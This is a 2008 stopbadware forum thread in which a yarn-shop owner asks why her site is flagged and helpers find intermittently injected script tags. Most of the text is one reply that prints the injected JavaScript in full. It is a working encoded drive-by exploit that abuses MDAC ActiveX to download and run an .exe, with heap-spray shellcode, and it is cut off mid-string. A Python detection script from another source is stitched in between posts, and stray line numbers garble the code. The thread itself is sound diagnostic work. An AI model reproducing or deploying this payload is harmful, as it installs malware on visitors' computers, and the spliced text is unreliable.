What is wrong with GardenPartyFibers.com


Flattery

Jan 13, 2008, 5:27:55 PM
to stopbadware
I have tested the few out links this site has and none of them are in
the bad sites database.

Originally I put up a web ring on this site and then the next day
Google marked it bad. I can understand that so I removed it and
requested a review and then the review came back saying that the site
was still dangerous.

I have searched through the code and find nothing. The site does not
distribute software and has very little javascript on the page. No
flash...

I have requested a review from stopbadware as well and I am waiting on
that, but will their review give me any more information than Google's
review? If they really want to eliminate badware it would work better
if we knew what they were calling badware on the site so we could help
and remove the badware as well.

If you want to heal a patient with cancer you don't just say you have
cancer and then not tell him where the cancer is... You tell him
where the cancer is so that it can be removed. At the very least,
Google could offer a paid service to get rid of the badware and make a
fortune.

The site is http://GardenPartyFibers.com and it sells yarn.

Oliver Fisher

Jan 13, 2008, 5:40:24 PM
to stopbadware
What URLs did Google say were bad after the review?

Oliver Fisher

Jan 13, 2008, 5:58:01 PM
to stopbadware
This looks fun - in a horribly painful sort of way...

I just did 4 requests to the first url (ANGOVDBE78). The 1st and 3rd
contained script tags just after the <BODY> tag:

<script language='JavaScript' type='text/javascript' src='ysxgj.js'></script>

and

<script language='JavaScript' type='text/javascript' src='eizru.js'></script>

The two js files are almost identical and contain a large chunk of
escaped script.

The 2nd and 4th requests I made to ANGOVDBE78 did NOT contain the
<script> tag. It looks like you've got something and it's trying to
hide.

O.

On Jan 13, 5:43 pm, Flattery <rob...@hickorytech.net> wrote:
> It seems to be across the board but here is a list:
>
> #http://gardenpartyfibers.com/view_product.php?product=ANGOVDBE78
> #http://gardenpartyfibers.com/tellafriend.php?product=50-GIFTCERT&sess...
> #http://gardenpartyfibers.com/gallery.php?ImageId=37
> #http://gardenpartyfibers.com/view_product.php?product=GOLKNKRL14
> #http://gardenpartyfibers.com/tellafriend.php?product=SUPBE1MR199&sess...
> #http://gardenpartyfibers.com/tellafriend.php?product=GOLKNKRL14&sessi...
> #http://gardenpartyfibers.com/view_product.php?product=GAR54I6V205
> #http://gardenpartyfibers.com/gallery.php?ImageId=37
> #http://gardenpartyfibers.com/tellafriend.php?product=50-GIFTCERT&sess...
> #http://gardenpartyfibers.com/tellafriend.php?product=SUPBE1MR199&sess...
> #http://gardenpartyfibers.com/view_product.php?product=ANGOVDBE78
> #http://gardenpartyfibers.com/view_product.php?product=GOLKNKRL14
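The on/off behaviour Oliver describes (the injected tag present on the 1st and 3rd request but absent on the 2nd and 4th) is exactly what lets a single "view source" miss it. The following check is an added example, not code from the thread: it takes several response bodies for the same URL, looks for a `<script src>` placed right after the opening `<body>` tag, and reports whether the injection is intermittent. The sample responses are constructed; the optional live fetch helper assumes only the standard library.

```python
import re
from collections import Counter

# A <script ... src="..."> tag sitting directly after the opening <body ...> tag,
# with only whitespace between them. Attribute order and quote style vary, so both
# are tolerated; case-insensitive because the injected tag followed an upper-case <BODY>.
BODY_SCRIPT_RE = re.compile(
    r"<body[^>]*>\s*<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE | re.DOTALL,
)


def injected_script_src(html):
    """Return the src of a script tag placed immediately after <body>, or None."""
    m = BODY_SCRIPT_RE.search(html)
    return m.group(1) if m else None


def compare_responses(bodies):
    """Given several response bodies for one URL, report which requests carried an
    injected script and the distinct src values seen. A legitimate page returns the
    same markup every time; a tag that comes and goes between requests is the tell."""
    hits = {}
    for idx, body in enumerate(bodies, start=1):
        src = injected_script_src(body)
        if src:
            hits[idx] = src
    all_idx = set(range(1, len(bodies) + 1))
    return {
        "requests": len(bodies),
        "with_script": sorted(hits),
        "without_script": sorted(all_idx - set(hits)),
        "srcs": dict(Counter(hits.values())),
        "intermittent": 0 < len(hits) < len(bodies),
    }


# Constructed sample responses modelled on the thread: one clean page and two
# variants with a randomly named .js file injected right after <BODY>.
CLEAN = "<html><head><title>Yarn</title></head>\n<BODY>\n<h1>Shop</h1></BODY></html>"
INJECTED_A = CLEAN.replace(
    "<BODY>\n",
    "<BODY>\n<script language='JavaScript' type='text/javascript' src='ysxgj.js'></script>\n",
)
INJECTED_B = CLEAN.replace(
    "<BODY>\n",
    "<BODY>\n<script language='JavaScript' type='text/javascript' src='eizru.js'></script>\n",
)


def fetch_n(url, n=4):
    """Optional live check (not used by the sample run): request the URL n times with
    a browser-like User-Agent, since injections of this kind often key on the client."""
    import urllib.request
    out = []
    for _ in range(n):
        req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            out.append(resp.read().decode("utf-8", "replace"))
    return out


if __name__ == "__main__":
    # Same 1st/3rd vs 2nd/4th pattern as reported in the thread.
    print(compare_responses([INJECTED_A, CLEAN, INJECTED_B, CLEAN]))
```

Run it against the live site with `compare_responses(fetch_n(url, 6))`; a non-empty `with_script` list together with `intermittent` set is worth treating as a compromise even when your own browser shows a clean page.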

Flattery

Jan 13, 2008, 6:03:15 PM
to stopbadware
That is odd. It does not show up on my computer when I view source...
but thank you it gives me some direction.

Not sure why this shows up for you and not for me...

Murdoch

Jan 13, 2008, 9:37:19 PM
to stopbadware
My server too has been infected by this exploit. We should compare
software version lists. If there is a common piece of software, that
means it is the likely culprit.

The server is running cPanel 11.16.0-R18546 with PHP 4.4.7, MySQL
4.1.22, Apache 2.0.61, and Perl 5.8.8.

Chris Wright

Jan 13, 2008, 9:58:09 PM
to stopb...@googlegroups.com
Oliver Fisher wrote:
> This looks fun - in a horribly painful sort of way...
>
>
<script src="quryb.js" type="text/javascript" language="JavaScript">
var arg="ajqbitue";

// Build the download URL on the infected host itself, so each compromised site serves its own file
var MU = "http://" + document.location.hostname + "/" + arg;
var MH = '';
var MUT = MU;
for (i=0; i < MUT.length; i++)
{
  var b = MUT.charCodeAt (i);
  MH = MH + b.toString (16);   // hex-encode each character of the URL
}
MH = MH.toUpperCase();
if (Math.round(MUT.length/2) != (MUT.length/2))
{
  MH += '00';                  // odd-length URL: pad so the hex string splits into whole 16-bit words
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
  // swap each byte pair into a %uXXXX escape, i.e. the URL as little-endian UTF-16 words
  MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";    // URL as a quoted JS string literal for the decoded page
var MR2 = "\"" + MR + "\"";    // %u-encoded URL for use inside the unescape()d payload
26var SB =
27unescape
('%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%0a%66%75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72%20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67%68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61%72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%20%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d%30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%72%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20%63%68%61%72%73%2e%6c%65%6e%67%74%68%29%3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20
%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65%74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c%73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e%75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f%2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%70%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28%64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f%46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%09%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%4d%44%41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%3
3%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%41%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38%33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27%7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%27%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38%34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20%27%7b%45%38%43%43%43%44%44%46%2d%43%41%32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41%72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%30%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76%61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20%75%72%6c%52%65%61%6c%45%78%65%20%3d%20%20%20%20%20%20')
+
28MU2 +
29unescape
('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20%26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%76%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29%20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c%3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62%73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%65%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75%6c%6c%3b%20%7d%0a%0a%09%09%69%66%20%28%61%29%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%73%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b%0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72%69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%09%6e%20%3d%20%30%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09%09%09%09%69%66%20%28%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%09%6e%3d%31%3b%0a%09%09
%09%09%09%7d%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69%66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%26%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20%64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%65%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61%74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72%20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%77%69%6e%22%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34%29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%76%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28%6e%20%3d%3d%20%30%29%20%7b%0a%09%09%09%09%09%74%72%79%20%7b%0a%09%09%09%09%09%09%76%5b%32%5d%2e%52%75%6e%28%6e%61%6d%65%2c%20%30%29%3b%0a%09%09%09%09%09%09%72%65%74%20%3d%20%31%3b%0a%09%09%09%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%09%09%09%7d%20%65%6c%73%65%20%7b%0a%0a%09%09%09%09%09%74%72%79%20%7b%0a%09%09%09%09%09%09%76%5b%32%5d%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%6e%61%6d%65%2c%20%22%22%2c%20%22%22%2c%20%22%6f%70%65%6e%22%2c%20%30%29%3b%0a%09%09%09%09%09%09%72%65%74%20%3d%20%31%3b%0a%09%09%09%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61%72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%29%0a%7b%0a%09%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79%3b%0a%09%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76%69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61%79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73%70%72%61%79%53%6c%69%64%65%53%6
9%7a%65%29%0a%09%7b%0a%09%09%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%09%7d%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%73%70%72%61%79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%65%74%53%70%49%64%28%69%64%29%0a%7b%0a%09%74%72%79%20%7b%0a%09%09%76%61%72%20%74%6f%64%61%79%44%61%74%65%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b%0a%09%09%74%6f%64%61%79%44%61%74%65%2e%73%65%74%44%61%74%65%28%74%6f%64%61%79%44%61%74%65%2e%67%65%74%44%61%74%65%28%29%20%2b%20%31%29%3b%0a%0a%09%09%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%20%3d%0a%09%09%09%22%69%64%3d%22%20%2b%20%69%64%20%2b%0a%09%09%09%22%3b%20%65%78%70%69%72%65%73%3d%22%20%2b%20%74%6f%64%61%79%44%61%74%65%2e%74%6f%47%4d%54%53%74%72%69%6e%67%28%29%20%2b%0a%09%09%09%22%3b%20%70%61%74%68%3d%2f%22%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0a%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%7b%0a%09%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%0a%09%09%76%61%72%20%70%61%79%4c%6f%61%64%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66%65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22%20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%
35%31%31%25%75%30%37%65%31%25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66%33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25%75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75%32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22%25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a%22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31
%30%25%75%66%66%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%22%20%2b%0a%22%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66%61%31%22%20%2b%20')
+
30MR2 +
31unescape
('%29%3b%0d%0a%09%09%76%61%72%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3b%0d%0a%09%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a%65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c%65%6e%67%74%68%20%2a%20%32%3b%0d%0a%09%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28%70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%29%3b%0d%0a%09%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30%63%30%63%25%75%30%63%30%63%22%29%3b%0d%0a%0d%0a%09%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%3b%0d%0a%09%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d%20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0d%0a%09%0d%0a%09%09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42%6c%6f%63%6b%73%3b%69%2b%2b%29%20%7b%0d%0a%09%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70%72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%61%64%43%6f%64%65%3b%0d%0a%09%09%7d%0d%0a%0d%0a%0